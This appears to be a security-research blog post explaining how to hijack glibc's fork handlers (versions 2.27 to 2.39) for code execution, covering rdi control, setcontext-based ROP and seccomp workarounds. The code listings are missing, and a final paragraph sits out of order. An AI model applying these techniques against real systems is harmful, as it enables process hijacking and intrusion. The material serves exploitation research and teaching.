fork_handlers
The forgotten brother of __exit_funcs
Last updated
The forgotten brother of __exit_funcs
Last updated
Some of you may be familiar with the exit handlers which are ran when calling exit()
. These are typically used to clean up anything before the program is terminated, but they're also quite useful for attackers to hijack code execution. They're ideal, because by overwriting the __exit_funcs array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're popular for attackers, they employ pointer mangling on the function pointers.
However there are other places where handlers like these are used, and one place I stumbled across when investigating the exit handlers, was the fork handlers, and after some investigation, I found some tricks to abuse the fork handlers to convert fork
into a constraintless one gadget.
fork
has its own handlers for multiple situations:
prepare_handler
parent_handler
child_handler
These are stored in a single array/linked list called fork_handlers
, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specifc order. There are a few things that separate these from exit handlers:
No pointer mangling.
No argument control.
So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in ret2gets. To see that, let's have a closer look at fork
across multiple versions, as the implementation of the handlers as changed, which also changes how we'd abuse them.
(The specific version used here is 2.35
)
Let's first have a look at what a fork_handler
looks like:
prepare_handler
: Handlers to prepare the process to fork
, so they're run before the fork
.
parent_handler
: Handlers run as the parent after the fork
.
child_handler
: Handlers run as the child after the fork
.
dso_handle
: A unique id to identify which binary/shared library registered this handler.
These are stored in an array called fork_handlers
, which is defined as:
The way this definition works is by stating a few "parameters" using macros, then including malloc/dynarray-skeleton.c, which then defines a struct called fork_handler_list
, plus a bunch of handlers for this struct.
These dynarray
structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields:
fork
is defined as follows:
Here we call __run_fork_handlers
with atfork_run_prepare, indicating it wants to execute the prepare
handlers.
So now it will go through the array from the last element (for backwards compatibility reasons), executing each prepare_handler
if they exist. The methods fork_handler_list_size
and fork_handler_list_at
are some of methods automically defined when we defined fork_handler_list
, which just index the array and get the length (used
) respectively. Locking may also be used, if there are multiple threads running.
At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.
First it checks the first argument edi
, and if it's 0
, then it means it should run the prepare
handlers. Then checks if it should use locking, if so, jump to +288
, where it will lock, then resume by jumping back to +23
.
But then something interesting happens. [fork_handlers]
is loaded into rbp
(which corresponds to fork_handlers->used
), then is loaded into rdi
. How interesting! It then goes on to call the prepare_handler
:
So theoretically, controlling the field used
could grant us rdi
control.
The reason for this is the same reason why ret2gets works. Let's go back to +84
(when the index is decremented):
+91
checks the index rbp
is within the bounds of the array (less than used
). If it's not, then it goes on to call __libc_dynarray_at_failure, interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when used
gets loaded. It could load used
into any register, but chooses rdi
, because in the case where this error happens, it doesn't need to waste time loading it into rdi
again, because it's already there.
To demonstrate this, we'll use the very realistic application attack scenario above, where we have a libc leak, an arbitrary write, and a call to fork
we want to hijack.
We can start by writing some basic methods to create the structures:
So we can use handler_array(libc.sym.system)
to craft an array that will execute system
, but we now need to control rdi
. We can do this by setting used
to some pointer to /bin/sh
. However if we use a regular address to point to the handler array, then the large used
field will cause it to access invalid memory, as it will access the last handler. So if we need used
to be an address, why don't we just alter the address of the handler array. As long as
points to our handler, then it'll work. We can forge such an address as follows:
Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless __register_atfork or __unregister_atfork is used). Putting this all together, we can arrive at the following exploit:
This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to execve
, meaning calling system
is useless now! Is that all we can do with a function call with a controlled argument? Yes, thanks for reading.
This is where setcontext
comes in! I covered this already here, but basically this allows us to get ROP through the use of a function resembling the sigreturn
syscall. We can substitute this in as follows:
For demo purposes, I'm just executing execve
, but you can do much more with setcontext
.
Both of these examples require the /bin/sh
string or the SigreturnFrame
to already exist in memory, or be apart of the arbitrary write. But what if we don't have such a luxury? Well since rdi
will be controlled for every function call, we can use gets
to write data to the argument, before using it for system
:
Or setcontext
:
Our good old friend enemy seccomp isn't always easily defeated by setcontext
, because there's a nuisance I have yet to cover. If we have another look at setcontext
:
We see that it executes a syscall before it sets the context, with syscall number 0xe
. This is sigprocmask
, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like seccomp
's strict mode), meaning this could invoke seccomp
's wrath.
What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in rdx
, not rdi
, so we'd need to control rdx
somehow.
Wouldn't it be nice if we could convert our current rdi
control into rdx
control, because rdx
isn't used by __run_fork_handlers
. Well it turns out there is a gadget that can do just that!
Exactly one in fact. However if you're anything like me (and I surely hope not), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).
It seems to belong to a function __memset_erms
, which in hindsight makes sense. It explains the rep stos
instruction: it's filling the buffer with the character al
. And since rep stos
increments rdi
, it needs to save a copy, so that it can return that original pointer, as that's the defined behaviour of memset
.
But why did it compile like this, and why is rdx
used, surely this could change, right? Well let's find out:
Turns it the reason it compiled that way, is because that's exactly how libc wanted it: it used assembly language (.S
is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:
It's simple, so not much to change in the first place.
If it ain't broke, don't fix it.
It's not actually used, it's just used for performance measuring.
Fantastic, we have a mov rdx, rdi
gadget! But one final snag, we ideally want to set rcx
or rdx
to 0
before this gadget executes, so that rep stos
finishes immediately (i.e. doesn't run).
Putting this all together, we arrive at the following:
There's a weird edge case that I found with 2.28-2.29
, which seems to coincide with the versions that didn't have the do_locking
argument (which was added in 2.30).
Above we see that the used
field is loaded into rax
, but not into rdi
. But after the first call:
used
is loaded into rdi
. Weird...
I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a ret
to get past the first call, which would also be compatible with 2.30+
.
And if it doesn't happen at all?
Well, rdi
shouldn't be used by anything else if it's not used for used
, so ret2gets would also be a possibility, however I am yet to test it.
(The specific version used here is 2.39
)
You'll have noticed that the previous section was specifically for 2.28-2.35
. This is because the implementation of fork_handlers
changes throughout the versions. So, what's changed now?
Well, not much actually. Firstly, the fork_handler
struct has a new field: id
And a separate function for running prefork
handlers has been created:
The function for running prefork
handlers isn't much different either:
The main addition is the use of id
. What seems to be implied by the comments here, is that now each handler has a unique id
, which increments each time a new one is added. This means ones added later will have a larger id
. Due to the different locking pattern here, handlers could be de-registered and/or registered when a prepare_handler
is being executed, so it ensures that only ones that were present before the current one was are executed, therefore skipping ones with a higher id
.
For us, all this changes is that the structure of fork_handler
is different, and we just need to include an id
field, where it's increasing with each handler. The updated handlers are as follows:
While these changes don't affect the regular cases for system("/bin/sh")
or setcontext
, it (indirectly) affects the setcontext
case where we need to skip sigprocmask
. In the version of glibc I used for the demo, rdx
is used by __run_prefork_handlers
:
Here we see at +128
that rdx=5*r14
, where r14
is sl
(the number of handlers). rdx
then gets multiplied by 8
, which ultimately means r14
got multiplied by 40
/0x28
, (the size of fork_handler
). This is in preparation for the loop where it checks the id
fields, which is why it actually points to the previous handler's id
field (-0x30
instead of -0x28
).
In this case, we can actually set used
to a value that, when multiplied by 5, points to a context. This will make rdi
a junk value, which means you can't use gets
to populate the context (RIP), but apart from that, it's no problem!
(The specific version used here is 2.27
)
You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how fork_handlers
is implemented, but also how they're exploited. This is because we no longer have the rdi
control trick through the used
field.
fork_handler
is now defined as:
A few more fields than before:
next
: Points to next handler, as __fork_handlers
is now a singly linked list.
refcntr
: Reference count of this handler.
need_signal
: Unused in fork
, so we'll ignore it.
We're no longer using a dynarray
, so there is no used
field to control to gain rdi
control (cringe). Let's have a look at fork
then:
Not much so far, it just checks THREAD_SELF
for if the process is multi-threaded. There's also no function for handing the fork handlers anymore: it's incorporated into fork
itself.
First it needs to access the root of the linked list of handlers: __fork_handlers
. However since the process could be multi-threaded and they didn't dicover locking yet it needs to do it in a thread-safe way (hence the weirdness with atomic_full_barrier
etc.) but the jist is that it will grab __fork_handlers
if it exists, and (atomically) increment the refcntr
to claim ownership of it, ensuring it doesn't get freed while it's in use here.
A lock doesn't seem to be needed, as the fork_handler
entries are constant (besides refcntr
, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.
This now seems familiar, but instead of an accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can the same ones later for parent_handler
and child_handler
. To do this, it needs to claim ownership, so it increments the refcntr
.
Importantly, there's no function calls with arguments present here, except for alloca (compiler builtin) and atomic_increment (asm
block). So unlike 2.28+
, there's no rdi
control, because no functions (with a first argument) are called.
We can write methods to forge a fork_handler
list as follows:
You can do a standard array (forge
), or you can utilise the unused space to pack it as much as possible (forge_packed
). Both must contain at least the first refcntr
though, as we need to ensure that that is non-zero. The rest of the refcntr
's will be incremented, and if these are outside our data, they might corrupt other data, but if that's not a concern, then you can use smallest=True
.
Therefore the only way we can control rdi
is through prepare_handler
calls. We need a function that will populate rdi
with some writable address, which we could then write to using gets
. ret2gets is unfortunately not very applicable here, as it's quite limited prior to 2.30
(see here).
Thankfully, I was able to find an alternative: rand
.
rand is a psuedo random number generator, and with that comes the need to keep track of the random state. In this case, that state is unsafe_state, which is of type random_state
:
Well that's a good question, because we've seen before (in ret2gets) that locking lock
can result in lock
being loaded into rdi
.
Ah, it's our good ol' friend lll_unlock
.
Just like in ret2gets prior to 2.30, it only unlocks by using lll_unlock_wait_private
when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch rdi
.
The multi-threaded case is a bit more complex, but if it's locked with the value LLL_LOCK_INITIALIZER_LOCKED (1), then it also doesn't touch rdi
(yay). However, lock
can also contain the value LLL_LOCK_INITIALIZER_WAITERS (2), in which case the dec
won't result in 0
, and will execute lll_unlock_wait_private
, thus clobbering rdi
.
This should be unlikely to happen to rand
's lock, as you'd need multiple threads trying to access rand
at the same time, but it's not impossible, so be careful.
So let's go back to random
, specifically __random_r
. We can use rand
followed by gets
to write to the unsafe_state
, but we'll need to call rand
again to put unsafe_state
back into rdi
after gets
. And if we call rand
using a corrupted unsafe_state
, then we could cause a crash?
So we need to conform to random_state
:
But this contains multiple pointers, including at the beginning, where we might want to put /bin/sh
string for example! But are these always used? Let's check __random_r
:
At first glance, we can see the fptr
, rptr
, state
pointers being used in the else
clause. However, there's an interesting case: buf->rand_type == TYPE_0
. This seems to be much simpler, and doesn't use fptr
or rptr
! It does still use state
, but as long as it's populated with a writable address, it won't SEGFAULT
. The default rand_type
is TYPE_3, but we can easily overwrite it to TYPE_0.
Putting this together, we arrive at the following for system("/bin/sh")
:
We're also able to use this for setcontext
:
This time our work is actually mostly done for us, because 2.27
and prior, setcontext
doesn't use rdx
for the ucontext
.
So it's just as simple as jumping to setcontext+37
(or later).
It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with ret2gets, which will trace fork
with angr
, and log what the arguments to each call to prepare_handler
were.
So why would we care about this? I mean sure, we can control fork
to either execute system
for a shell, or setcontext
for ROP/shellcode, but that's only useful is there are calls to fork
. Not all applications will use fork
after all.
What about functions in glibc? Surely some of them will use fork
, after all there's functions like system
which would create a new process to execute a shell command, right?
Well unfortunately not many glibc functions use __libc_fork
.
_IO_old_popen (not used)
vfork (if the vfork
syscall doesn't exist)
The rest, like system
or popen
will use an inlined clone
call.
Well, like I mentioned in the beginning, by overwriting fork_handlers
, we effectively have turned fork
into a one_gadget
. However, this has a few benefits over a regular one_gadget
:
No constraints.
Can trigger ROP.
So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.
However, a lot of what's been done here can also be done with exit
, and easier as well, as that has explicit argument control, the only downside there is that you have to deal with pointer mangling too.
In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)
This state is passed to __random_r
, as the first argument . What's more is that __random_r
is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep unsafe_state
in rdi
(we'll look at this in a bit).